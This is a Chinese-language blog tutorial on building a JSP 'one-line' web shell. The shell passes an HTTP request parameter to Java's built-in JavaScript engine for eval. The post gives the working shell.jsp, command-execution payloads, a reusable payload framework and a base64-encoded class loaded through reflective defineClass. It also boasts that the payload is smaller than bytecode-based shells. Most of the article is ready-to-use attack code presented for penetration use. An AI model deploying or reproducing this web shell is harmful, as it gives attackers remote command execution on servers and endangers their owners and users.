手把手简单制作一个 Java 木马程序 深碍√TFBOYSˉ_ 2022-08-29 10:12 146阅读 0赞 ## 你知道的越多,不知道的就越多,业余的像一棵小草! ## 你来,我们一起精进!你不来,我和你的竞争对手一起精进! ## 编辑:业余草 ## juejin.cn/post/6990715558178062372 ## 推荐:https://www.xttblog.com/?p=5253 ## ## 前言 ## 一直以来,Java 一句话木马都是采用打入字节码 defineClass 实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现 Java 上的所有功能。不足之处就是 Payload 过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承 ClassLoader,反射调用 defineClass 等。本在这里提出一种 Java 一句话木马:利用 Java 中 JS 引擎实现的一句话木马。 ## 基本原理 ## 1. Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 2. Java从1.6开始自带ScriptEngineManager这个类,原生支持调用js,无需安装第三方库。 3. ScriptEngine支持在Js中调用Java的对象。 综上所述,我们可以利用Java调用JS引擎的eval,然后在Payload中反过来调用Java对象,这就是本文提出的新型Java一句话的核心原理。 ScriptEngineManager全名javax.script.ScriptEngineManager,从Java 6开始自带。其中Java 6/7采用的js解析引擎是Rhino,而从java8开始换成了Nashorn。不同解析引擎对同样的代码有一些差别,这点后面有所体现。 如果说原理其实一两句话就可以说清楚,但是难点在于Payload的编写。跨语言调用最大的一个难点就是数据类型以及方法的转换。例如Java中有byte数组,Js中没有怎么办?C++里有指针但是Java里没有这个玩意怎么办? 在实现期间踩了很多的坑,这篇文章跟大家一起掰扯掰扯,希望能给大家提供点帮助。 ### 获取脚本引擎 ### //通过脚本名称获取: ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript"); //简写为js也可以 //通过文件扩展名获取: ScriptEngine engine = new ScriptEngineManager().getEngineByExtension("js"); //通过MIME类型来获取: ScriptEngine engine = new ScriptEngineManager().getEngineByMimeType("text/javascript"); ### 绑定对象 ### ScriptEngine engine = new ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.eval(request.getParameter("mr6")); 或者通过 eval 的重载函数,直接把对象通过一个HashMap放进去 new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("ant"), new javax.script.SimpleBindings(new java.util.HashMap() { { put("response", response); put("request", request); }})) ### eval ### 综合上面两步,有很多种写法,例如: shell.jsp <% javax.script.ScriptEngine engine = new javax.script.ScriptEngineManager().getEngineByName("js"); engine.put("request", request); engine.put("response", response); engine.eval(request.getParameter("mr6")); %> 或者直接缩写成一句: <% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("mr6"), new javax.script.SimpleBindings(new java.util.HashMap() { { put("response", response); put("request", request); }})); %> 以执行命令为例: > ❝ > > POST:mr6=java.lang.Runtime.getRuntime().exec("calc"); > > ❞ ![b4f3c46bceb0e2fe4471e69a0c9a3128.png][] java调用本地计算器 即可达到命令执行的效果。 ## 基本语法 ## 翻阅文档比较枯燥,这里挑一些用到的说一说。 感兴趣的同学也可以看一下原文档:https://docs.oracle.com/en/java/javase/12/scripting/java-scripting-programmers-guide.pdf ### 调用Java方法 ### 前面加上全限定类名即可 var s = [3]; s[0] = "cmd"; s[1] = "/c"; s[2] = "whoami";//yzddmr6 var p = java.lang.Runtime.getRuntime().exec(s); var sc = new java.util.Scanner(p.getInputStream(),"GBK").useDelimiter("\\A"); var result = sc.hasNext() ? sc.next() : ""; sc.close(); ### 导入Java类型 ### var Vector = java.util.Vector; var JFrame = Packages.javax.swing.JFrame; //这种写法仅仅支持Nashorn,Rhino并不支持 var Vector = Java.type("java.util.Vector") var JFrame = Java.type("javax.swing.JFrame") ### 创建Java类型的数组 ### // Rhino var Array = java.lang.reflect.Array var intClass = java.lang.Integer.TYPE var array = Array.newInstance(intClass, 8) // Nashorn var IntArray = Java.type("int[]") var array = new IntArray(8) ### 导入Java类 ### 默认情况下,Nashorn 不会导入Java的包。这样主要为了避免类型冲突,比如你写了一个new String,引擎怎么知道你new的是Java的String还是js的String?所以所有的Java的调用都需要加上全限定类名。但是这样写起来很不方便。 这个时候大聪明Mozilla Rhino 就想了一个办法,整了个扩展文件,里面提供了importClass 跟importPackage 方法,可以导入指定的Java包。 * importClass 导入指定Java的类,现在推荐用Java.type * importPackage 导入一个Java包,类似import com.yzddmr6.\*,现在推荐用JavaImporter 这里需要注意的是,Rhino对该语法的错误处理机制,当被访问的类存在时,Rhino加载该class,而当其不存在时,则把它当成package名称,而并不会报错。 load("nashorn:mozilla_compat.js"); importClass(java.util.HashSet); var set = new HashSet(); importPackage(java.util); var list = new ArrayList(); 在一些特殊情况下,导入的全局包会影响js中的函数,例如类名冲突。这个时候可以用JavaImporter,并配合with语句,对导入的Java包设定一个使用范围。 // create JavaImporter with specific packages and classes to import var SwingGui = new JavaImporter(javax.swing, javax.swing.event, javax.swing.border, java.awt.event); with (SwingGui) { // 在with里面才可以调用swing里面的类,防止污染 var mybutton = new JButton("test"); var myframe = new JFrame("test"); } ### 方法调用与重载 ### 方法在JavaScript中实际上是对象的一个属性,所以除了使用 . 来调用方法之外,也可以使用\[\]来调用方法: var System = Java.type('java.lang.System'); System.out.println('Hello, World'); // Hello, World System.out['println']('Hello, World'); // Hello, World Java支持重载(Overload)方法,例如,System.out 的 println 有多个重载版本,如果你想指定特定的重载版本,可以使用\[\]指定参数类型。例如: var System = Java.type('java.lang.System'); System.out['println'](3.14); // 3.14 System.out['println(double)'](3.14); // 3.14 System.out['println(int)'](3.14); // 3 ## Payload结构设计 ## 详情写在注释里了 //导入基础拓展 try { load("nashorn:mozilla_compat.js"); } catch (e) {} //导入常见包 importPackage(Packages.java.util); importPackage(Packages.java.lang); importPackage(Packages.java.io); var output = new StringBuffer(""); //输出 var cs = "${jspencode}"; //设置字符集编码 var tag_s = "${tag_s}"; //开始符号 var tag_e = "${tag_e}"; //结束符号 try { response.setContentType("text/html"); request.setCharacterEncoding(cs); response.setCharacterEncoding(cs); function decode(str) { //参数解码 str = str.substr(2); var bt = Base64DecodeToByte(str); return new java.lang.String(bt, cs); } function Base64DecodeToByte(str) { importPackage(Packages.sun.misc); importPackage(Packages.java.util); var bt; try { bt = new BASE64Decoder().decodeBuffer(str); } catch (e) { bt = Base64.getDecoder().decode(str); } return bt; } function asoutput(str) { //回显加密 return str; } function func(z1) { //eval function return z1; } output.append(func(z1)); //添加功能函数回显 } catch (e) { output.append("ERROR:// " + e.toString()); //输出错误 } try { response.getWriter().print(tag_s + asoutput(output.toString()) + tag_e); //回显 } catch (e) {} ## 语法问题的坑 ## ### 两种语言对象间的相互转换 ### 要注意的是,在遇到Java跟JS可能存在类型冲突的地方,即使导入了包也要加上全限定类名。 在编写payload的时候被坑了很久的一个问题就是,在导入java.lang以后写new String(bt,cs)没有加全限定类名,导致打印出来的一直是一个字符串地址。 正确的操作是new java.lang.String(bt,cs)。因为在Java和Js中均存在String类,按照优先级,直接new出来的会是Js的对象。 下面附上类型对比表: <table> <thead> <tr> <th>JavaScript Value</th> <th>JavaScript Type</th> <th>Java Type</th> <th>Is Scriptable</th> <th>Is Function</th> </tr> </thead> <tbody> <tr> <td>{a:1, b:['x','y']}</td> <td>object</td> <td>org.mozilla.javascript.NativeObject</td> <td><strong>「+」</strong></td> <td>-</td> </tr> <tr> <td>[1,2,3]</td> <td>object</td> <td>org.mozilla.javascript.NativeArray</td> <td><strong>「+」</strong></td> <td>-</td> </tr> <tr> <td>1</td> <td>number</td> <td>java.lang.Double</td> <td>-</td> <td>-</td> </tr> <tr> <td>1.2345</td> <td>number</td> <td>java.lang.Double</td> <td>-</td> <td>-</td> </tr> <tr> <td>NaN</td> <td>number</td> <td>java.lang.Double</td> <td>-</td> <td>-</td> </tr> <tr> <td>Infinity</td> <td>number</td> <td>java.lang.Double</td> <td>-</td> <td>-</td> </tr> <tr> <td>-Infinity</td> <td>number</td> <td>java.lang.Double</td> <td>-</td> <td>-</td> </tr> <tr> <td>true</td> <td>boolean</td> <td>java.lang.Boolean</td> <td>-</td> <td>-</td> </tr> <tr> <td>"test"</td> <td>string</td> <td>java.lang.String</td> <td>-</td> <td>-</td> </tr> <tr> <td>null</td> <td>object</td> <td>null</td> <td>-</td> <td>-</td> </tr> <tr> <td>undefined</td> <td>undefined</td> <td>org.mozilla.javascript.Undefined</td> <td>-</td> <td>-</td> </tr> <tr> <td>function () { }</td> <td>function</td> <td>org.mozilla.javascript.gen.c1</td> <td><strong>「+」</strong></td> <td><strong>「+」</strong></td> </tr> <tr> <td>/.*/</td> <td>object</td> <td>org.mozilla.javascript.regexp.NativeRegExp</td> <td><strong>「+」</strong></td> <td><strong>「+」</strong></td> </tr> </tbody> </table> ### Rhino/Nashorn解析的差异 ### 这也是当时一个坑点,看下面一段代码 var readonlyenv = System.getenv(); var cmdenv = new java.util.HashMap(readonlyenv); var envs = envstr.split("\\|\\|\\|asline\\|\\|\\|"); for (var i = 0; i < envs.length; i++) { var es = envs[i].split("\\|\\|\\|askey\\|\\|\\|"); if (es.length == 2) { cmdenv.put(es[0], es[1]); } } var e = []; var i = 0; print(cmdenv+'\n'); for (var key in cmdenv) {//关键 print("key: "+key+"\n"); e[i] = key + "=" + cmdenv[key]; i++; } 其中cmdenv是个HashMap,这段代码在Java 8中Nashorn引擎可以正常解析,var key in cmdenv的时候把cmdenv的键给输出了 ![94e139c70541e441f7835291d582d6cc.png][] 但是在Java 6下运行时,Rhino把他当成了一个js对象,把其属性输出了 ![01da6a3ea52ab69d794392df5b1b215c.png][] 所以涉及到这种混合写法就会有异议,不同的引擎有不同的解释。 解决办法使用Java迭代器即可,不掺杂js的写法。 var i = 0; var iter = cmdenv.keySet().iterator(); while (iter.hasNext()) { var key = iter.next(); var val = cmdenv.get(key); //print("\nkey:" + key); //print("\nval:" + val); e[i] = key + "=" + val; i++; } ### 反射的坑 ### 在Java中,如果涉及到不同版本之间类的包名不一样,我们通常不能直接导入,而要使用反射的写法。 例如base64解码的时候,Java的写法如下 public byte[] Base64DecodeToByte(String str) { byte[] bt = null; String version = System.getProperty("java.version"); try { if (version.compareTo("1.9") >= 0) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } else { Class clazz = Class.forName("sun.misc.BASE64Decoder"); bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } return bt; } catch (Exception e) { return new byte[]{}; } } 改写成js风格后,发现会有一些奇奇怪怪的BUG。(后来发现反射其实也可以实现,导入Java类型然后再传入反射参数即可,就是比较麻烦) ![4acb497f7a0bba4ffde2d18c9e086352.png][] function test(str) { var bt = null; var version = System.getProperty("java.version"); if (version.compareTo("1.9") >= 0) { var clazz = java.lang.Class.forName("java.util.Base64"); var decoder = clazz.getMethod("getDecoder").invoke(null); bt = decoder .getClass() .getMethod("decode", java.lang.String.class) .invoke(decoder, str); } else { var clazz = java.lang.Class.forName("sun.misc.BASE64Decoder"); bt = clazz .getMethod("decodeBuffer", java.lang.String.class) .invoke(clazz.newInstance(), str); } return bt; } 但是在Js中,我们并不需要这么麻烦。上面提到过如果importPackage了一个不存在的包名,Js引擎会将这个错误给忽略,并且由于Js松散的语言特性,我们仅仅需要正射+异常捕获就可以完成目的。大大减小了payload编写的复杂度。 function Base64DecodeToByte(str) { importPackage(Packages.sun.misc); importPackage(Packages.java.util); var bt; try { bt = new BASE64Decoder().decodeBuffer(str); } catch (e) { bt = Base64.getDecoder().decode(str); } return bt; } ## 保底操作 ## 理论上,我们可以用js引擎的一句话实现所有字节码一句话的功能,退一万步讲,如果有些功能实在不好实现,或者说想套用现有的payload应该怎么办呢。 我们可以用java调用js后,再调用defineClass来实现: 编写一个命令执行的类:calc.java import java.io.IOException; public class calc { public calc(String cmd){ try { Runtime.getRuntime().exec(cmd); } catch (IOException e) { e.printStackTrace(); } } } 编译之后base64一下 > base64 -w 0 calc.class yv66vgAAADQAKQoABwAZCgAaABsKABoAHAcAHQoABAAeBwAfBwAgAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAGTGNhbGM7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAHwcAIQcAHQEAClNvdXJjZUZpbGUBAAljYWxjLmphdmEMAAgAIgcAIwwAJAAlDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uDAAoACIBAARjYWxjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBAAMoKVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABgAHAAAAAAABAAEACAAJAAEACgAAAIgAAgADAAAAFSq3AAG4AAIrtgADV6cACE0stgAFsQABAAQADAAPAAQAAwALAAAAGgAGAAAABAAEAAYADAAJAA8ABwAQAAgAFAAKAAwAAAAgAAMAEAAEAA0ADgACAAAAFQAPABAAAAAAABUAEQASAAEAEwAAABMAAv8ADwACBwAUBwAVAAEHABYEAAEAFwAAAAIA 填入下方payload try { load("nashorn:mozilla_compat.js"); } catch (e) {} importPackage(Packages.java.util); importPackage(Packages.java.lang); importPackage(Packages.java.io); var output = new StringBuffer(""); var cs = "UTF-8"; response.setContentType("text/html"); request.setCharacterEncoding(cs); response.setCharacterEncoding(cs); function Base64DecodeToByte(str) { importPackage(Packages.sun.misc); importPackage(Packages.java.util); var bt; try { bt = new BASE64Decoder().decodeBuffer(str); } catch (e) { bt = new Base64().getDecoder().decode(str); } return bt; } function define(Classdata, cmd) { var classBytes = Base64DecodeToByte(Classdata); var byteArray = Java.type("byte[]"); var int = Java.type("int"); var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod( "defineClass", byteArray.class, int.class, int.class ); defineClassMethod.setAccessible(true); var cc = defineClassMethod.invoke( Thread.currentThread().getContextClassLoader(), classBytes, 0, classBytes.length ); return cc.getConstructor(java.lang.String.class).newInstance(cmd); } output.append( define( "yv66vgAAADQAKQoABwAZCgAaABsKABoAHAcAHQoABAAeBwAfBwAgAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAGTGNhbGM7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAHwcAIQcAHQEAClNvdXJjZUZpbGUBAAljYWxjLmphdmEMAAgAIgcAIwwAJAAlDAAmACcBABNqYXZhL2lvL0lPRXhjZXB0aW9uDAAoACIBAARjYWxjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TdHJpbmcBAAMoKVYBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABgAHAAAAAAABAAEACAAJAAEACgAAAIgAAgADAAAAFSq3AAG4AAIrtgADV6cACE0stgAFsQABAAQADAAPAAQAAwALAAAAGgAGAAAABAAEAAYADAAJAA8ABwAQAAgAFAAKAAwAAAAgAAMAEAAEAA0ADgACAAAAFQAPABAAAAAAABUAEQASAAEAEwAAABMAAv8ADwACBwAUBwAVAAEHABYEAAEAFwAAAAIAGA==", "calc" ) ); response.getWriter().print(output); 成功弹出计算器 ![80e3c5f9539a5d026f9b54766aecfd94.png][] 也就是说,新型一句话在特殊情况下,还可以继续兼容原有的字节码一句话,甚至复用原有的Payload。 ## 测试 ## 测试环境:Java>=6 同样的列目录Payload,原有的字节码方式数据包长度为7378,而新型JSP一句话仅仅为2481,差不多为原有的三分之一。 ![a2ee908ff1cbd5a0fb06b7366e9022dc.png][] 找漏洞 ![f8d3e54959bffe44f6f588cb000254ae.png][] 字节码方式数据包 列目录![5c6d15008cd89af247a8d551278527dc.png][] ## 最后 ## 基于JS引擎的Java一句话体积更小,变化种类更多,使用起来更灵活。范围为Java 6及以上,基本可以满足需求,但是Payload写起来非常麻烦,也不好调试,算是有利有弊。 提出新型一句话并不是说一定要取代原有的打入字节码的方式,只是在更复杂情况下,可以提供给渗透人员更多的选择。 ![d8a342fcb23e82cb1be417da5817d31b.png][] [b4f3c46bceb0e2fe4471e69a0c9a3128.png]: /images/20220829/09fc1c37899d4fe4b01b3b5d80bdcdd8.png [94e139c70541e441f7835291d582d6cc.png]: /images/20220829/f4f28cce601e4e78af1a98d8d08175d3.png [01da6a3ea52ab69d794392df5b1b215c.png]: /images/20220829/97b2a44693424f5583e66a1b08370341.png [4acb497f7a0bba4ffde2d18c9e086352.png]: /images/20220829/01d98787892546cb97f7cc7b8eec845e.png [80e3c5f9539a5d026f9b54766aecfd94.png]: /images/20220829/8efb38793ae14b93a9a0ee2bef5214dd.png [a2ee908ff1cbd5a0fb06b7366e9022dc.png]: https://img-blog.csdnimg.cn/img_convert/a2ee908ff1cbd5a0fb06b7366e9022dc.png [f8d3e54959bffe44f6f588cb000254ae.png]: /images/20220829/66fb2dc5db3a44c0b32107bf72f7523a.png [5c6d15008cd89af247a8d551278527dc.png]: /images/20220829/16bd0a8d79304512bce7f97165cf03a5.png [d8a342fcb23e82cb1be417da5817d31b.png]: /images/20220829/fa456d47a3d94246a5219903f1464a3a.png
还没有评论,来说两句吧...